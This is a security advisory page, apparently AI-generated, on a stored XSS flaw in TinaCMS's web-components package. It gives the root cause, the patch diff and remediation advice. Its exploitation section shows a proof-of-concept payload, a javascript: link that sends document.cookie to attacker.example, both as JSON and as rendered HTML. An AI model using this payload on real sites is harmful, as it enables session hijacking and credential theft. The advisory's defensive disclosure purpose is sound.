CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-108260

CVE-2026-108260: Stored Cross-Site Scripting (XSS) in @tinacms/web-components

Alon Barad
Alon Barad
Software Engineer

Oct 10, 2026·5 min read·3 visits

Executive Summary (TL;DR)

Unsanitized link and image URLs in @tinacms/web-components allow content editors to inject stored cross-site scripting payloads via javascript: URIs.

A Stored Cross-Site Scripting vulnerability in @tinacms/web-components prior to version 0.2.1 allows low-privileged content authors to execute arbitrary JavaScript code in the context of website visitors via unsanitized URL attributes in custom Markdown rendering components.

Vulnerability Overview

CVE-2026-108260 (also tracked as GHSA-c42q-qvc3-j6vg) is a Stored Cross-Site Scripting (Stored XSS) vulnerability in @tinacms/web-components, a core web component package within the TinaCMS headless content management framework ecosystem.

TinaCMS utilizes custom web components such as <tina-markdown> to parse and render rich-text Markdown Abstract Syntax Tree (AST) structures into standard HTML DOM elements. The package handles content generated by users, editors, and automated workflows across web applications built with TinaCMS.

Prior to version 0.2.1 of @tinacms/web-components, the component failed to validate URI schemes when assigning URL properties from AST nodes to rendered HTML element attributes. As a result, low-privileged users capable of submitting or editing Markdown content can embed arbitrary JavaScript code using script-capable URI schemes such as javascript:.

When end users or platform administrators interact with rendered elements, the injected code executes directly within their active browser origin. This enables session hijacking, administrative token theft, and unauthorized background operations.

Root Cause Analysis

The fundamental root cause of CVE-2026-108260 lies in incomplete input neutralization across distinct content parsing branches in packages/@tinacms/web-components/src/tina-markdown.js (classified under CWE-79 and CWE-83).

While raw HTML fragments processed by the component were sanitized using DOMPurify, structured Markdown AST link nodes (node.type === 'a') and image nodes (node.type === 'img') bypassed this protection entirely. The parsing logic extracted the raw node.url value directly from the input JSON or AST object and assigned it directly to HTMLElement.href or HTMLElement.src properties.

Because standard browser DOM bindings automatically execute javascript: protocol strings assigned to anchor href attributes upon activation, the absence of scheme verification creates a direct path from untrusted AST nodes to client-side code execution.

Code Analysis & Patch Review

Examination of packages/@tinacms/web-components/src/tina-markdown.js before the patch highlights the flawed conditional logic within the node renderer function:

function renderNode(node) {
  const tag = getTag(node);
  /** @type {HTMLElement} */
  const el = document.createElement(tag);
 
  // VULNERABLE: Direct property assignment without scheme verification
  if (node.url && node.type === 'a') el.href = node.url;
  if (node.url && node.type === 'img') el.src = node.url;
 
  return el;
}

To remediate this vulnerability in commit 5295e077f0d279c35686a0e481a15e33a4877e3b (PR #7523), the developers integrated the sanitizeUrl helper function from @tinacms/mdx/sanitize-url. This helper verifies that candidate URLs match an allow-list of safe protocols (http, https, mailto, tel, xref, or relative paths). If an unapproved scheme such as javascript: is passed, sanitizeUrl evaluates to an empty string "".

import { sanitizeUrl } from '@tinacms/mdx/sanitize-url';
import DOMPurify from 'dompurify';
 
function renderNode(node) {
  const tag = getTag(node);
  /** @type {HTMLElement} */
  const el = document.createElement(tag);
 
  // PATCHED: URL input sanitization applied prior to DOM property assignment
  if (node.url && node.type === 'a') el.href = sanitizeUrl(node.url);
  if (node.url && node.type === 'img') el.src = sanitizeUrl(node.url);
 
  return el;
}

The fix successfully neutralizes script injection while preserving operational relative and absolute links. The inclusion of sanitizeUrl aligns @tinacms/web-components with the sanitization patterns enforced in TinaCMS React and Astro renderer implementations.

Exploitation & Attack Mechanics

Exploitation requires low-privileged access to create or modify content handled by TinaCMS. The attacker constructs a rich-text payload containing an AST node with a malicious protocol URI.

An example JSON AST payload injected into the content store takes the following form:

{
  "type": "root",
  "children": [
    {
      "type": "a",
      "url": "javascript:fetch('https://attacker.example/steal?c=' + encodeURIComponent(document.cookie))",
      "children": [
        {
          "type": "text",
          "text": "Click here to verify account information"
        }
      ]
    }
  ]
}

When <tina-markdown> processes this object on a rendered public page or administrative preview, it generates the following DOM structure:

<a href="javascript:fetch('https://attacker.example/steal?c=' + encodeURIComponent(document.cookie))">Click here to verify account information</a>

When a victim clicks the link, the browser executes the script payload in the context of the active domain, bypassing traditional input filters that only inspect raw string HTML.

Impact Assessment

The CVSS v3.1 base score for CVE-2026-108260 is 7.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N). The scope is evaluated as Changed (S:C) because execution shifts from content authoring to the application runtime environment.

Successful exploitation allows attackers to perform session hijacking, harvest session tokens or OAuth bearer tokens from standard web storage (localStorage and sessionStorage), perform unauthorized REST API operations on behalf of administrative users, or rewrite DOM content to phish for credentials.

> [!NOTE] > Web applications relying on session cookies lacking the HttpOnly attribute are particularly exposed to direct cookie extraction via this mechanism.

Remediation & Defensive Guidance

Organizations using @tinacms/web-components should immediately upgrade to version 0.2.1 or higher. Monorepo setups managing tinacms dependencies should update the primary package to version 3.14.0 or higher.

Execute the following command in affected project workspaces:

npm install @tinacms/web-components@0.2.1

In addition to package updates, engineering teams should enforce a strict Content Security Policy (CSP) header across application domains. Restricting script sources prevents execution of inline protocols (javascript:):

Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';

Finally, stored Markdown content in CMS repositories should be scanned for occurrences of javascript: protocol strings to identify pre-existing malicious entries.

Official Patches

TinaCMSGitHub Security Advisory GHSA-c42q-qvc3-j6vg
TinaCMSPull Request #7523: URL Sanitization Fix

Fix Analysis (1)

Technical Appendix

CVSS Score
7.6/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Affected Systems

@tinacms/web-components < 0.2.1tinacms < 3.14.0

Affected Versions Detail

Product
Affected Versions
Fixed Version
@tinacms/web-components
TinaCMS
< 0.2.10.2.1
tinacms
TinaCMS
< 3.14.03.14.0
AttributeDetail
CWE IDCWE-79 / CWE-83
Attack VectorNetwork (HTTP/HTTPS)
CVSS v3.1 Score7.6 (High)
Privileges RequiredLow (Author / Editor)
User InteractionRequired (Clicking link)
Exploit StatusProof of Concept
KEV StatusNot Listed

MITRE ATT&CK Mapping

T1189Drive-by Compromise
Initial Access
T1185Browser Session Hijacking
Collection
CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The soft/web application improperly neutralizes script and protocol attributes when rendering web content.

Known Exploits & Detection

GitHub Security AdvisoryProof of concept markdown AST payload and advisory details

Vulnerability Timeline

Security patch committed to tinacms repository
2026-09-08
GitHub Security Advisory GHSA-c42q-qvc3-j6vg published
2026-10-09
CVE-2026-108260 indexed by NVD
2026-10-09

References & Sources

  • [1]GitHub Security Advisory GHSA-c42q-qvc3-j6vg
  • [2]Fix Commit 5295e077f0d279c35686a0e481a15e33a4877e3b
  • [3]Pull Request #7523
  • [4]Release Tag @tinacms/web-components@0.2.1
  • [5]NVD Vulnerability Detail - CVE-2026-108260
  • [6]CVE Record - CVE-2026-108260

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•37 minutes ago•GHSA-W2CH-4XGR-22WW
5.3

GHSA-W2CH-4XGR-22WW: Missing Authorization in Vikunja Task Relation Deletion

An authorization bypass vulnerability in Vikunja versions prior to v2.6.0 permits authenticated users to delete relationships between tasks across project boundaries without requiring read or write authorization for the target related task.

Alon Barad
Alon Barad
1 views•5 min read
•about 2 hours ago•CVE-2026-108258
6.9

CVE-2026-108258: Path Traversal in Shiny for Python Bookmark Restoration

A path traversal vulnerability in Shiny for Python (posit-dev/py-shiny) versions 1.4.0 through 1.6.3 allows unauthenticated remote attackers to read arbitrary files and traverse directories via crafted _state_id_ query parameters.

Alon Barad
Alon Barad
1 views•4 min read
•about 4 hours ago•CVE-2026-108261
9.3

CVE-2026-108261: Admin Preview Cross-Origin Bypass and GraphQL Hijacking in TinaCMS

A critical origin validation flaw in TinaCMS admin preview allows unauthenticated attackers to bypass cross-origin postMessage checks and execute unauthorized GraphQL queries and mutations under an authenticated editor's context.

Alon Barad
Alon Barad
5 views•5 min read
•about 5 hours ago•CVE-2026-108259
8.2

CVE-2026-108259: Code Injection in @tinacms/cli via Unsanitized Git Branch Name Interpolation

@tinacms/cli prior to version 3.0.0 dynamically constructs client source files using string interpolation without properly sanitizing runtime configuration variables. An attacker with permissions to create a branch or pull request can inject arbitrary JavaScript statements via a crafted Git ref name, leading to execution during automated build processes.

Amit Schendel
Amit Schendel
8 views•5 min read
•about 6 hours ago•CVE-2026-107804
5.3

CVE-2026-107804: Client IP Resolution Flaw & Authentication Lockout in Nginx UI

Nginx UI versions 2.2.0 through 2.5.10 fail to properly configure Gin framework trusted proxies when deployed behind a reverse proxy. This causes all incoming HTTP requests to be attributed to the loopback IP (127.0.0.1), enabling IP allowlist bypass and global authentication lockouts.

Amit Schendel
Amit Schendel
6 views•5 min read
•about 7 hours ago•CVE-2026-107805
7.5

CVE-2026-107805: Unauthenticated Storage Exhaustion in Nginx UI Node Authentication

Nginx UI versions 2.5.0 through 2.5.10 contain an uncontrolled resource consumption vulnerability in the node authentication handler. Unauthenticated remote attackers can exhaust host disk storage and I/O resources by submitting large HTTP request bodies to node-signature endpoints prior to cryptographic signature validation.

Alon Barad
Alon Barad
4 views•6 min read